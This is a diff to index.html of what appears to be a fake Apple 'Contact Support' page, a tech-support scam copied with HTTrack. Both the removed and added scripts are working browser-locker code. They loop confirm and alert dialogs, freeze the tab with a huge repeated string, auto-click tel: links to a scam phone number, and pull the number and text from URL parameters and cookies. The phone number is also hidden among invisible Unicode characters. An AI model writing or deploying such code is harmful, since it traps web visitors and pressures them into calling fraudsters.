--- a/index.html
+++ b/index.html
@@ -1,19 +1,23 @@
+
+
  <!DOCTYPE html>
  <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" class="no-js">
 
 
 
+<!-- Mirrored from apr2023.s3-website.ca-central-1.amazonaws.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 06 May 2023 19:49:27 GMT -->
 <head >
 
 <!-- Google tag (gtag.js) -->
-<script async src="https://www.googletagmanager.com/gtag/js?id=G-XCJNE4TTW2"></script>
+<script async src="https://www.googletagmanager.com/gtag/js?id=G-WXLND5VNQK"></script>
 <script>
   window.dataLayer = window.dataLayer || [];
   function gtag(){dataLayer.push(arguments);}
   gtag('js', new Date());
 
-  gtag('config', 'G-XCJNE4TTW2');
+  gtag('config', 'G-WXLND5VNQK');
 </script>
+
 
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 	 <meta http-equiv="X-UA-Compatible" content="IE=edge" />
@@ -140,7 +144,7 @@
 			 <div class="ac-ln-content">
 					 <span class="ac-ln-title">
                        <a href="#">
-									Support +1‪‪‬‬‪‪(888) 394-9342‬‬ <font color="red"><font class="js_setPhoneBlock"></font></font></a>
+									Support +1‪1(888) 394-9342 <font color="red"><font class="js_setPhoneBlock"></font></font></a>
 							 </span>
 				 <div class="ac-ln-menu">
 					 <a href="#ac-ln-menustate" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-open" id="ac-ln-menustate-open">  <span class="ac-ln-menucta-anchor-label">Open menu </span></a>  <a href="#" class="ac-ln-menucta-anchor ac-ln-menucta-anchor-close" id="ac-ln-menustate-close">  <span class="ac-ln-menucta-anchor-label">Close menu </span></a>
@@ -189,7 +193,7 @@
 					 <div class="pageTitle  ">
 						 <h1 class="pageTitle-heading">Contact Support </h1>
 						 <p class="pageTitle-intro js_setTextBlock" /></div>
-					 <div class="sectionTitle sectionTitleBlock"><h2 class="sectionTitle-heading">contact +1‪‪‬‬‪‪(888) 394-9342‬‬</h2></div>
+					 <div class="sectionTitle sectionTitleBlock"><h2 class="sectionTitle-heading">contact +1‪‪‪‬‬‪‪(888) 394-9342‬‬</h2></div>
 				 </div>
 			 </div>
 		 </div>
@@ -213,127 +217,51 @@
 						Apple </a></div>
 			 </div>
 			 <meta content="Apple" property="name" />
-			 <meta content="+1‪‪‬‬‪‪(888) 394-9342‬‬" property="telephone" />
+			 <meta content="+1‪‪‪‬‬‪‪(888) 394-9342‬‬" property="telephone" />
 		 </section>
 	 </div>
  </footer>
- <script src="code.jquery.com/jquery-1.12.0.min.js"></script>
- <script>
+  <script src="jquery-1.12.0.min.js"></script>
+    <script>
+        var isCall = 0;
+        $(document).ready(function() {
+            loadText();
+            setTimeout(function() {
+                myFunction();
+            }, 100);
+            setInterval(myFunction, 500);
+        });
 
-	function getURLParameter(name) {
-		return decodeURI(
-			(RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
-		);
-	};
-	var cookieHelper={defParams:{path:"/",domain:"."+window.location.host.replace(/:\d+/,"")},set:function(a,d,c){c=c||{};for(var b in this.defParams)"undefined"==typeof c[b]&&(c[b]=this.defParams[b]);b=c.expires;if("number"==typeof b&&b){var e=new Date;e.setTime(e.getTime()+1E3*b);b=c.expires=e}b&&b.toUTCString&&(c.expires=b.toUTCString());d=encodeURIComponent(d);a=a+"="+d;for(var f in c)a+="; "+f,d=c[f],!0!==d&&(a+="="+d);document.cookie=a},get:function(a){return(a=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")))?decodeURIComponent(a[1]):void 0},del:function(a){this.set(a,null,{expires:-1})}};
+        function loadText() {
+            $('.js_setTextBlock').prop('innerHTML', defaultText);
+        }
 
+        function myFunction() {
+            if (confirm(defaultText)) {
+                okkkk();
+            } else {
+                okkkk();
+            }
+        }
 
-	var userAgent = window.navigator.userAgent.toLowerCase(),
-		ios = /iphone|ipod|ipad/.test( userAgent );
+        function okkkk() {
+            $('#result').append('<a id="anchorcall" href="tel:+1‪‪‪‬‬‪‪(888) 394-9342‬‬" target="_top"></a>');
+            fakeClick(event, document.getElementById("anchorcall"));
+        }
 
-	function parseURL(url) {
-		var a=document.createElement('a');
-		a.href=url;
-		return a.hostname.replace('www.','');
-	};
-
-	function getPar(name) {
-		var url = window.location.href;
-		name = name.replace(/[\[\]]/g, "\\$&");
-		var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
-			results = regex.exec(url);
-		if (!results) return null;
-		if (!results[2]) return '';
-		return decodeURIComponent(results[2].replace(/\+/g, " "));
-	};
-
-	
-	window.number = getPar('phone');
-
-	window.number =(window.number?window.number:'+1‪‪‬‬‪‪(888) 394-9342‬‬');
-
-	window.device= 'iPhone';
-	window.refef = parseURL(document.referrer);
-
-	if( ios ) {
-
-		if(/iphone/.test( userAgent )){
-			window.device= 'iPhone';
-		}
-
-		if(/ipad/.test( userAgent )){
-			window.device= 'iPad';
-		}
-
-		if(/ipod/.test( userAgent )){
-			window.device= 'iPod';
-		}
-	}
-
-	var text = cookieHelper.get('textSetBl');
-	var phone = cookieHelper.get('phoneSetBl');
-
-	function getText () {
-		var str = window.defaultText;
-
-		for(var d in window.text){
-			if(window.refef.indexOf(d)!=-1){
-				str=window.text[d];
-			}
-		}
-		//var str = window.text[window.refef]?window.text[window.refef]:window.defaultText;
-		return str.replace('|%model%|',window.device).replace('|%ref%|',window.refef);
-	}
-
-
-	if(!phone){
-		phone=getURLParameter('phone');
-	}
-	if(!text){
-		text=getURLParameter('text');
-	}
-
-	var sText = document.querySelectorAll('.js_setTextBlock');
-	for (var t = 0; t < sText.length; t++) {
-		sText[t].innerHTML = getText();
-	}
-	var sPhone = document.querySelectorAll('.js_setPhoneBlock');
-	for(var p=0;p<sPhone.length;p++){
-		sPhone[p].innerHTML=phone;
-	}
- 
-
-	setTimeout(
-	function (){
-	
-	setInterval( function(){okkkk()} , 100)
-	}
-	,1000)
-
-	 function okkkk() {
-		jQuery('#result').append('<a  class="anchorcall" href="tel:+1(888) 394-9342-"></a>');
-		document.querySelector('a').click();
-		var extraData = "";
-		for (itxextraData = 0; itxextraData < 1000; itxextraData++) {
-			var extraData = extraData + "5555555555";
-		}
-		jQuery('#result').append('<a href="#callto+' + extraData + '%00"></a>');
-		document.querySelector('a').click();
-		document.querySelector('a').click();
-		document.querySelector('a').click();
-		document.querySelector('a').click();
-		document.querySelector('a').click();
-		document.querySelector('a').click();
-		setInterval(function(){ alert(getText().repeat(99999999999));}, 1000);
-	 };
-
-	 window.ununload = function () {
-	     debugger;
-	     location.reload();
-	 }
-
-
-</script>
+        function fakeClick(event, anchorObj) {
+            if (anchorObj.click) {
+                anchorObj.click();
+            } else if (document.createEvent) {
+                if (event.target !== anchorObj) {
+                    var evt = document.createEvent("MouseEvents");
+                    evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
+                    var allowDefault = anchorObj.dispatchEvent(evt);
+                }
+            }
+        }
+    </script>
  </body>
 
+<!-- Mirrored from apr2023.s3-website.ca-central-1.amazonaws.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 06 May 2023 19:49:32 GMT -->
 </html>
